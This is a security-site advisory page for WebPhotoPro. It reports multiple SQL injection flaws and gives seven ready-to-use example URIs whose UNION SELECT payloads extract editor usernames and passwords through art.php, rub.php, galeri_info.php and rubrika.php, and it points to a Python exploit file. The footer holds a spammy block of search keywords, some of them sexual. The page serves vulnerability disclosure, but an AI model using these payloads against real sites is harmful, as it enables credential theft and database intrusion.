about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WebPhotoPro Multiple SQL Injection Vulnerabilities


Title WebPhotoPro Multiple SQL Injection Vulnerabilities
Published 2008-12-14-12:00AM
Updated 2008-12-19-03:52PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  baltazar and sinner_01
Vulnerable  WebPhotoPro WebPhotoPro 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/art.php?idm=1'+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13+from+editor/*
http://www.example.com/rub.php?idr=1+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor--
http://www.example.com/rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9+from+editor--
http://www.example.com/rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9,10+from+editor--
http://www.example.com/galeri_info.php?ida=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6+from+editor/*
http://www.example.com/galeri_info.php?ida=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor/*
http://www.example.com/rubrika.php?idr=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor--The following exploit is also available:
  • /data/vulnerabilities/exploits/32829.py
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Sun, 29 Nov 2009 14:24:53 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    Sex youth sex picter mambo Remo 99ed.cn sxe news for c site sexe Gambar+art AnyMacro ip board 2 Squid webp seksy linux 2.4. 3xmove iibexysimi wwwxxcom php fusion www.era-gr A...??.htm A...??.htm kar20 CMS is Fre Microsoft Kas www.rudang xingyuan.z myBB 1.2.1 www.fgcar. None 200 /compo iiqahykoze www.qq188. phpbb 2005 t276t Mercury Bo www.qfenzu openwebmai phpBB admi www.18zl.c AssoCIate wwwsexygri Scuriti.co DZCP news for c sexgirlsxx F.E.A.R www.35677 BBtoNuke 2 WWW.Thisha news for c